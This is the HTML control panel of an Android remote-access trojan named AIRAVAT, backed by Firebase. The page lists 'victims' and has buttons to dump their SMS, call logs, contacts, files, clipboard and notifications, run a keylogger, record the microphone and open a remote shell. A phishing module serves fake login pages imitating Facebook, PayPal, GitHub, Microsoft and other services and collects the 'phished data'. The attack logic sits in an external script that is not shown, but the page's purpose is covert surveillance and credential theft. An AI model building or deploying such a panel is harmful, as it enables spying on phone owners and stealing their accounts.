
<!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">

<title>AIRAVAT</title>
<meta charset="UTF-8" />
<link rel="icon" href="./img/logo.png"  >
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script src="./firebase-app.js"></script>
<script src="./firebase-auth.js"></script>
<script src="./jquery.js"></script>
<script src="./firebase-database.js"></script>
<script type="text/javascript">
//EDIT UNDER THIS ONLY

const firebaseConfig = {
  apiKey: "AIzaSyBohOk0wLURjhwTRUoy_Xc-WLkabfcXNLk",
  authDomain: "android-96fb5.firebaseapp.com",
  databaseURL: "https://android-96fb5-default-rtdb.firebaseio.com",
  projectId: "android-96fb5",
  storageBucket: "android-96fb5.firebasestorage.app",
  messagingSenderId: "379079478920",
  appId: "1:379079478920:web:02946706ddfbbbc8fad93d"
};
 

//DON'T EDIT BELOW THIS




firebase.initializeApp(firebaseConfig);
</script>
</head>
<style type="text/css">
*{
padding:0;
margin:0;
outline:0;
font-family:Verdana,sans-serif;
}
@font-face {
font-family: 'eglantine';
font-style: normal;
font-weight: normal;
src: local('eglantine'), url('./asset/eglantine.woff') format('woff');
}
#users{
height:100%;
padding-bottom:15px;
background:#fff;
width:100%;
z-index:999999999;
color:black;
display:block;
position:relative;
}
.usr{
height:auto;
width:90%;
padding:10px;
color:#000;
border-radius:5px;
background:#fff;
border:1px solid #0dd;
box-shadow:0px 0px 5px  black;
margin:auto;
}
.usr button{
height:30px;
width:150px;
border:0;
background:white;
border-radius:5px;
border:1px solid #16a34a;
color:black;
}
#resp{
padding-bottom:20px;
width:100%;
background:#fff;
position:absolute;
top:0;
color:#0dd;
left:0;
overflow:scroll;
height:calc(100% - 20px);
display:none;
}
#resp li{
list-style:none;
width:calc(100% - 50px);
height:50px;
padding-left:50px;
line-height:50px;
user-select:none;
position:relative;
overflow:auto;
}

.fo{
background:url("./img/imgg1.png");
background-size:30px 25px;
background-repeat:no-repeat;
background-position:10px 12px;
}
.fi{
background:url("./img/imgg3.png");
background-size:25px 30px;
background-repeat:no-repeat;
background-position:12px 12px;
}
.vi{
background:url("./img/i4.png");
background-size:30px 30px;
background-repeat:no-repeat;
background-position:10px 12px;
}
.im{
background:url("./img/imgg2.png");
background-size:30px 30px;
background-repeat:no-repeat;
background-position:10px 12px;
}
#cmdcernter {
position:fixed;
top:0;
left:0;
opacity:1;
background:green;
z-index:99999;
}
#resp  b{
position:absolute;
right:10px;
top:0px;
color:rgb(0,255,0);
}
#fprev {
position:absolute;
top:0;
left:0;
height:100%;
width:100%; 
color:green;
display:none;
background:#001;
z-index:99999999;
text-align:center;
}
#fprev img{
max-height:50%;
max-width:100%;
}
#fprev li{

padding:10px;
text-align:left;
padding-left:10px;
width:80%;
overflow:scroll;
color:#0dd;
list-style:none;
}
#fprev li:nth-child(5){
text-align:center;
background:#fff;
border:1px solid #16a34a;
border-radius:5px;
margin:auto;
}
#fprev ul{
}
.span{
color:white;
position:absolute;
top:10px;
border-radius:50%;
height:35px;
width:35px;
background:red;
text-align:center;
left:10px;
font-size:35px;
line-height:35px;
}
#phones{
width:100%;
height:100%;
position:absolute;
top:0;
left:0;
z-index:99999999;
display:none;
}
#phones .icon{
height:50px;
width:50px;
margin:20px;
text-align:center;
font-size:10px;
color:#282828;
line-height:20px;

}

i.fas , i.fab {
	display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    gap: 5px;
}

.dfle{
width:100%;
display:flex;
justify-content:center;
}
.dfle div{
border-radius:10px;
}
#preloaderr {
height:100%;
width:100%;
position:fixed;
top:0;
left:0;
z-index:9999999999999999998;
background:rgba(0,0,0,.9);
display:flex;
align-items:center;
justify-content:center;
}
#preloaderr .load {
height:50px;
width:50px;
border:3px solid #000;
border-top:3px solid #0dd;
border-radius:50%;
position:relative;
animation:ani 1s infinite;
}
@keyframes ani{
0%{
transform:rotate(0deg);
}
100%{
transform:rotate(360deg);
}
}
#loadtxt {
color:#0f0;
position:absolute;
margin-top:80px;
}
#maindiv{
position:fixed;
left:0;
top:50px;
height:calc(100% - 50px);
width:100%;
z-index:99;
background:#f5f6f7;
overflow:auto;
}
#tophead{
background: #fff;
border-bottom: 1px solid #e5e7eb;
text-align: center;
padding: 2px 0;
font-size: 10px;
position: fixed;
width: 100%;
top: 0;
z-index: 100;

}
h4.AIRAVAT{
letter-spacing:10px;
font-size:20px;
position:relative;
width:100%;
height:100%;
font-family:'eglantine';
color:#16a34a;
}


#barss{
color:white;
position:absolute;
top:0px;
right:5px;
font-size:40px;
}


#navbar{
height:100%;
width:70%;
background:rgba(0,0,0,.9);
position:fixed;
top:0;
left:0;
display:none;
transition:.5s;
padding-top:0;
z-index:9999999999999999999999999;
}
#navbar li{
list-style:none;
width:calc(100% - 20px);
height:60px;
text-align:justify;
line-height:60px;
color:#0dd;
padding-left:20px;
font-weight:bolder;
transition:.5s;
}
#navbar li:hover{
width:calc(100% - 30px);
padding-left:30px;
background:#001;
}
#backkk{
position:absolute;
top:20px;
display:none;
left:15px;
transform:scale(2);
}
.loginn img{
width:80px;
height:80px;
border-radius:50%;
}
#logindiv{
font-family: 'Comfortaa', cursive;
height:100%;
width:100%;
background: rgb(2,0,36);
background: linear-gradient(NaNdeg, rgba(2,0,36,1) 0%, rgba(16,16,146,1) 35%, rgba(0,212,255,1) 100%);
position: fixed;
top:0;
//display:none;
left:0;
z-index:99999;
justify-content:middle;
align-content:center;
margin:auto;
}
.loginn {
background:rgba(0,0,0,.1);
height:auto;
color:#FFC72C;
width:90%;
position:relative;
top:20px;
padding:15px;
text-align:center;
margin:auto;
border-radius:5px;
box-shadow:0px 0px 15px white;
}
.loginn input{
margin:5px;
font-size:20px;
border:0;
width:80%;
color:white;
background:transparent;
border-bottom:3px solid #FFC72C;
}
#lg{
height:50px;
width:150px;
background: transparent;
border:1px solid #16a34a;
border-radius:5px;
font-size:20px;
color: #FFC72C;
margin-top:10px;
}
input::placeholder{
color:grey;
}
.hqh{
background: transparent;
font-size:15px;
color:#0dd;
border:0;
}
#disclaim{
height:100%;
width:100%;
background:#fff;
text-align:center;
position:fixed;
top:0;
display:none;
left:0;
z-index:999999999999999999999;
}
#disclaim img{
height:30%;
width:30%;
}
.tos{
height:200px;
width:80%;
overflow:auto;
background:#eee;
padding:10px;
border-radius:5px;
margin:auto;
text-align:left;
}
.dis{
height:40px;
width:150px;
color:white;
border-radius:5px;
border:0;
background:green;
}
.diso{
background:red;
}
</style>
<body>


<style type="text/css">
.dgh{
position:absolute;
top:30px;
font-size:10px;
width:100%;
text-align:center;
}
</style>
<div id="tophead">

<h4 class="AIRAVAT">AIRAVAT</h4>
<div class="dgh" >&copy; Prateek Chaubey</div>

<div id="backkk" onclick="backk(this)">
<svg fill="#16a34a"  xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-arrow-left" viewBox="0 0 16 16">
<path fill-rule="evenodd" d="M15 8a.5.5 0 0 0-.5-.5H2.707l3.147-3.146a.5.5 0 1 0-.708-.708l-4 4a.5.5 0 0 0 0 .708l4 4a.5.5 0 0 0 .708-.708L2.707 8.5H14.5A.5.5 0 0 0 15 8z"/>
</svg>
</div>
</div>


<div id="maindiv" >
<div id="preloaderr" >
<div  class="load" >
</div>
<div id="loadtxt" >Processing</div>
</div>
<div id="users" >
<br>
<center>Getting List Of Victims ....</center>
</div>
<div id="phones" >
<br>

<div class="dfle"  style="" >
	<div class="icon" onclick="dumpsms()"><i class="fas fa-envelope fa-2x"></i>Messages</div>
	<div class="icon" onclick="calllogs()"><i class="fas fa-phone fa-2x"></i>Call Log</div>
	<div class="icon" onclick="filesmanager()"><i class="fas fa-file fa-2x"></i>Files</div>
	<div class="icon" onclick="getpackages()"><i class="fab fa-android fa-2x"></i>App List</div>
</div>
<div class="dfle"  style="" >
	<div class="icon" onclick="deviceinfo()"><i class="fas fa-info-circle fa-2x"></i>System Info</div>
	<div class="icon" onclick="toastt()"><i class="fas fa-comment-dots fa-2x"></i>Toast</div>
	<div class="icon" onclick="dumpcontact()"><i class="fas fa-address-book fa-2x"></i>Contacts</div>
	<div class="icon" onclick="funcmd('fmc1')"><i class="fas fa-music fa-2x"></i>Play Sound</div>
</div>
<div class="dfle"  style="" >
	<div class="icon" onclick="sendmsg()" ><i class="fas fa-paper-plane fa-2x"></i>Send SMS</div>
	<div class="icon" onclick="startshell()" ><i class="fas fa-terminal fa-2x"></i>Shell</div>
	<div class="icon" onclick="funcmd('fmc1')"><i class="fas fa-mobile-alt fa-2x"></i>Vibrate</div>
	<div class="icon" onclick="funcmd('fmc1')"><i class="fas fa-volume-up fa-2x"></i>TTS</div>

</div>
<div class="dfle"  style="" >
<div class="icon" onclick="keylogger()"><i class="fas fa-keyboard fa-2x"></i>Keylogger</div>
<div class="icon" onclick="notificationlog()"><i class="fas fa-bell fa-2x"></i>Notifications</div>
<div class="icon" onclick="showphish()" ><i class="fas fa-user-secret fa-2x"></i>Phished Data</div>
<div class="icon" onclick="showphpag()" ><i class="fas fa-exclamation-triangle fa-2x"></i>SE</div>

</div>

<div class="dfle"  style="">
<div class="icon" onclick="micrec()" ><i class="fas fa-microphone fa-2x"></i>Recordings</div>
<div class="icon" onclick="showclip()"><i class="fas fa-clipboard fa-2x"></i>ClipBoard</div>
<div class="icon" onclick="funcmd('fmc2')"><i class="fas fa-lightbulb fa-2x"></i>Torch</div>
<div class="icon" onclick="funcmd('fmc2')"><i class="fas fa-globe fa-2x"></i>Goto URL</div>

</div>

</div>


<div id="cmdcernter" style="display:none;" >
<input type="text" id="cmdref" placeholder="cmdref" value="/comds/comdsdc38kw6i"   ><br>
<input type="text" id="cmd"  placeholder="cmd type"  ><br>
<input type="text" id="cmdvar"  placeholder="cmm"  ><br>
<input type="text" id="cmdvarm"  placeholder="cmd var optional"  ><br>

<button onclick="cmd()" >Send</button><br>
</div>


<div id="resp" onclick="opfol(event)"   >
</div>


<div id="fprev"  >
<h4>Preview </h4><br>
<img id="imv"  src="img3.png" >
<iframe id="imv2"  src="img3.png" style="height:40%;width:100%;" ></iframe>
<br>
<hr>
<ul id="fprevdes" >
<li>Name :
<li>Size: 100 MB
<li>Creation: 11 Aug 2055
<li>Path: /sdcard/</li>
<li><a download=""  id="btdwn" target="_blank"  href="hh">Download File</a><br>
</ul>
<style type="text/css">
#btdwn{
font-weight:bolder;
color:green;
text-decoration:none;
}
#fprev iframe{
border:0;
}
#viewers {
position:absolute;
top:0;
left:0;
display:none;
height:100%;
width:100%;
z-index:99;
background:black;
}
#viewers iframe{
height:100%;
width:100%;
position:absolute;
top:0;
left:0;
border:0;
}
.down{
height:50px;
width:50px;
position:fixed;
bottom:50px;
right:30px;
border-radius:50%;
background:green;
text-align:center;
line-height:60px;
color:white;
}
.btn{
height:40px;
width:150px;
border:0;
border-radius:5px;
border:1px solid #16a34a;
background:black;
color:white;
} 

#notikey {
position:absolute;
top:0;
left:0;
display:none;
height:100%;
width:100%;
overflow:auto;
z-index:999;
background:#111;
}

.keylogg {
background:rgba(0,0,0,1);
width:calc(95% - 20px);
height:auto;
margin:auto;
padding:10px;
color:#f5f6f7;
padding-bottom:10px;
margin-top:8px;
border-radius:10px;
overflow:auto;
}

.keylogg  b{
color:white;
}
.keylogg img{
max-height:50px;
max-width:50px;
position:absolute;
left:20px;
}
.keylogg p{
color:#fff;
}
.keylogg span{
float:right;
margin-right:10px;
}
#shellcmd{
height:100%;
width:100%;
position:absolute;
top:0;
left:0;
overflow:hidden;
z-index:99;
display:none;
background:#000;
}
#shellcmdd{
height:30px;
width:98%;
background:#001;
position:absolute;
bottom:0;
left:0;
color:white;
border:1px solid silver;
padding:10px;
}
#shelldata{
height:calc(100% - 50px);
width:100%;
position:absolute;
top:0;
left:0;
overflow:scroll;
font-family:monospace;
color:white;
}
</style>
<br>

<span class="span"  onclick='this.parentElement.style.display="none";setdatcmd("cd",var32.substr(0,var32.lastIndexOf("/")),"",respov);'>×</span>
</div>


<div id="viewers" >
<iframe id="vieweri"  src="data:text/html,<h4 style='color:green' > Getting File for preview....</h4>" ></iframe>
<a href="#" id="downlo"  target="_blank" download="file.html"   ><div class="down" >				<svg  fill="white" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M19 9h-4V3H9v6H5l7 7 7-7zM5 18v2h14v-2H5z"/></svg>							</div></a>
</div>


<div id="shellcmd" >
<div id="shelldata" >AIRAVAT Shell<br><sub>(some root commands may not work properly)</sub> </div>
<input type="text" onkeyup="shellcm(this)"  id="shellcmdd" placeholder="Enter Your Command Here_"   />
</div>



<div id="notikey" style="display:none;" ></div>

<div id="toastdiv" >
<br>
<h3>Toast</h3>
<br>
<textarea type="text" id="toastcmd"  placeholder="Type Your Message Here"  /></textarea>
<br><br><button onclick="toastexc()">Execute</button>
</div>


<div  id="diamain" onclick="this.style.display='none';" >
<div class="diachild" >
<h3 style="color:#0dd" >Response</h3><br>
<p id="diatext" id="diatext" >This is response Text bsdk </p>
<br>
<button>OK</button>
</div>
</div>



<div id="pvtt" >
<h3 style="color:#16a34a" >FUN COMMANDS</h3><br><br>
<div id="fmc1" >
<div id="plmc" >
<h4>Play Music </h4><br>
<input type="text" id="musiccmd"  placeholder="Enter Direct .mp3 link"  >
<br><button onclick="playmus()" >Execute</button>
<br><br><hr><br>
</div>
<div id="vibradev" >
<h4>Vibrate Device </h4><br>
<input type="text" id="vibratecmd"  placeholder="Enter No. of Seconds"  >
<br><button onclick="vibra()">Execute</button>
<br><br><hr><br>
</div>
<div id="ttsdev" >
<h4>Text To Speech </h4><br>
<input type="text" id="ttscmd"  placeholder="Enter Your Text Message"  >
<br><button onclick="ttsf()">Execute</button>
<br>
</div>
</div>
<div id="fmc2" >
<div id="tonofff" >
<h4>Turn On/Off Torch</h4><br>
<button onclick="tont()">Turn On</button>
<button style="margin-left:10px;"  onclick="tofft()">Turn Off</button>
<br><br><hr><br>
</div>
<div id="oppweb" >
<h4>Open URL</h4><br>
<input type="text" id="opwebcmd"  placeholder="Enter Your URL including http://"  >
<br><button onclick="opwebl()">Execute</button>
</div>
</div>
</div>



<div id="senddm">
<h4 style="color:black;padding-left:40px">Send SMS</h4><br><br>
TO:<input type="text" id="smsnumber"  placeholder="Enter Mobile Number"  ><br><br>
Message:<br><br><textarea id="smscontent"  placeholder="Enter Message Content" ></textarea>
<br><br>
<center><button onclick="sendsms()">Send SMS</button></center>
</div>



<div id="wallpaperdiv" ><br>
<h3 style="color:#0f9" >Select Wallpaper </h3><br><br>
<div class="wallimg" >
<img src="./img/wall1.png" onclick="selectimg(this,0)" id="selectedimg" >
<img src="./img/wall2.png" onclick="selectimg(this,1)" >
<img src="./img/wall3.png" onclick="selectimg(this,2)"  >
</div>
<br>
<center><button onclick="setwalls()">Set Wallpaper</button></center>
</div>


<div id="micrec" >
<br>
<h3>Record</h3>
<br>
<input type="text" id="recval"  placeholder="Record For x Seconds"  />
<br><button class="btn"  onclick="recordvoice()">Record Mic</button>
<br>
<hr>
<br>
<br><h3>Recordings</h3><br>
<div id="showrecs" >
</div>

</div>



<div id="showphishj"  >
<br>
<h3>Phishing Commands</h3><br><br>
<input type="text" id="nshpih"  placeholder="Enter Notification Title"  /><br>
<br>
<center>
<select onchange="iojh()" id="lshpih" >
<option value='0'>dropbox3.png</option><option value='1'>facebook2.png</option><option value='2'>facebook5.png</option><option value='3'>free_fire3.png</option><option value='4'>github1.png</option><option value='5'>instagram1.png</option><option value='6'>linkedin1.png</option><option value='7'>messenger1.png</option><option value='8'>microsoft1.png</option><option value='9'>netflix1.png</option><option value='10'>paypal2.png</option><option value='11'>protonmail1.png</option><option value='12'>pubg2.png</option><option value='13'>snapchat1.png</option><option value='14'>tumblir1.png</option><option value='15'>twitter1.png</option><option value='16'>wordpress1.png</option><option value='17'>yahoo1.png</option>

</select>
<img src="./imgg/dropbox3.png" id="hion"  style="max-height:60px;max-width:60px;" >
<br><br>
</center>
<!--jjjwjjw-->
<center>
<select id="phpage" >
<option value="dropbox.html">

dropbox.html
</option>
<option value="facebook_desktop_homepage.html">

facebook_desktop_homepage.html
</option>
<option value="facebook_desktop_static.html">

facebook_desktop_static.html
</option>
<option value="facebook_mobile.html">

facebook_mobile.html
</option>
<option value="facebook_mobile_fake_security.html">

facebook_mobile_fake_security.html
</option>
<option value="garena_free_fire.html">

garena_free_fire.html
</option>
<option value="github.html">

github.html
</option>
<option value="instagram.html">

instagram.html
</option>
<option value="linkedin.html">

linkedin.html
</option>
<option value="messenger.html">

messenger.html
</option>
<option value="microsoft.html">

microsoft.html
</option>
<option value="netflix.html">

netflix.html
</option>
<option value="paypal.html">

paypal.html
</option>
<option value="protonmail.html">

protonmail.html
</option>
<option value="pubg.html">

pubg.html
</option>
<option value="snapchat.html">


snapchat.html
</option>
<option value="tumblr.html">

tumblr.html
</option>
<option value="twitter_desktop.html">

twitter_desktop.html
</option>
<option value="twitter_mobile.html">

twitter_mobile.html
</option>
<option value="wordpress.html">

wordpress.html
</option>
<option value="yahoo.html">

yahoo.html
</option>
</select>
<button onclick="execphish()"> Execute</button>
</center>
<br>

<br>
<input type="text" id="shpih"  placeholder="Enter Your Link"  />
<br><button class="btn"  onclick="execphish2()">Execute</button>
</div>

<style type="text/css">
#showphishj select{
height:40px;
margin:auto;
margin-top:20px;
color:#fff;
background:#001;
border-radius:5px;
}
#showphishj button{
height:30px;
width:150px;
background:#fff;
color:#0dd;
border-radius:5px;
margin-top:20px;
border:1px solid #f00;
}
audio{
display:none;
}
#showrecs{
overflow:auto;
color:#0fa;
}
::-webkit-scrollbar {
width: 0px;
}
.downlii,.plrec{
height:100%;
width:40px;
float:right;
margin-left:10px;
margin-right:0px;
margin-top:5px;
}
.downlii{
margin-right:20px;
}

.downlii svg,.plrec svg{
height:90%;
width:90%;
}
.downlii svg{
height:65%;
width:65%;
margin-top:8px;
}
.recswarp{
margin:auto;
margin-top:5px;
background:#001;
width:90%;
display:flex;
align-items:center;
border-radius:10px;
height:50px;
border: solid 1px #0dd;
}
#selectedimg{
border:2px solid #16a34a;
}
.wallimg{
display:flex;
height:200px;
margin:auto;
width:100%;
}
.wallimg img{
height:100%;
border-radius:7px;
margin-left:10px;
width:30%;
}
#pvtt h4{
color:black;
}
#pvtt input,#showphishj input,#senddm input,#micrec input[type="text"]{
height:30px;
padding:5px;
width:80%;
line-height:40px;
border:0.5px solid #0dd;
background:#f5f6f7;
color:#000;
border-radius:5px;
}

#senddm{color:#fff}
#senddm input{
height:20px;
margin-left:10px;
}
#toastdiv,#pvtt,#showphishj,#micrec,#senddm,#wallpaperdiv{
height:100%;
width:100%;
background:#f5f6f7;
position:absolute;
top:0;
left:0;
display:none;
z-index:99;
padding:50px;
}

#pvtt button,#micrec .btn,#senddm button,#wallpaperdiv button{
margin-top:10px;
height:30px;
width:110px;
color:#fff;
background:black;
border:1px solid #16a34a;
border-radius:5px;
}
/* use for test*/
#showphisj{
z-index:9999999999999;
display:block;
}
#pvtt{
width:calc(100% - 40px);
padding:20px;
}
.diachild p{
height:50px;
overflow:auto;
}
.diachild button{
height:30px;
width:110px;
color:#fff;
background:black;
float:right;
border:1px solid #16a34a;
border-radius:5px;
}
.diachild{
height:150px;
background:#001;
border-radius:10px;
color:white;
padding:10px;
border:1px solid green;
width:calc(100% - 50px);
}
#diamain{
height:100%;
width:100%;
background:white;
position:absolute;
top:0;
display:none;
align-items:center;
justify-content:center;
left:0;
z-index:99999999999999999;
}

#toastdiv h3,#micrec h3,#showphishj h3{
color:black;
}

#toastcmd,#senddm textarea{
margin-left:30px;
height:40%;
padding-top:10px;
padding-left:10px;
width:80%;
border:0.5px solid #0dd;
background:#f5f6f7;
color:#000;
border-radius:5px;
}
#toastdiv button{
margin-left:30px;
height:30px;
width:110px;
color:#fff;
background:black;
border:1px solid #16a34a;
border-radius:5px;
}
#cmdcernter {
display:none;
}
</style>
</div>
<script type="text/javascript" src="./script.js"></script>
<style>
img[alt*="www.000webhost.com"], .disclaimer {
display: none
}  
</style>
</body>
</html>
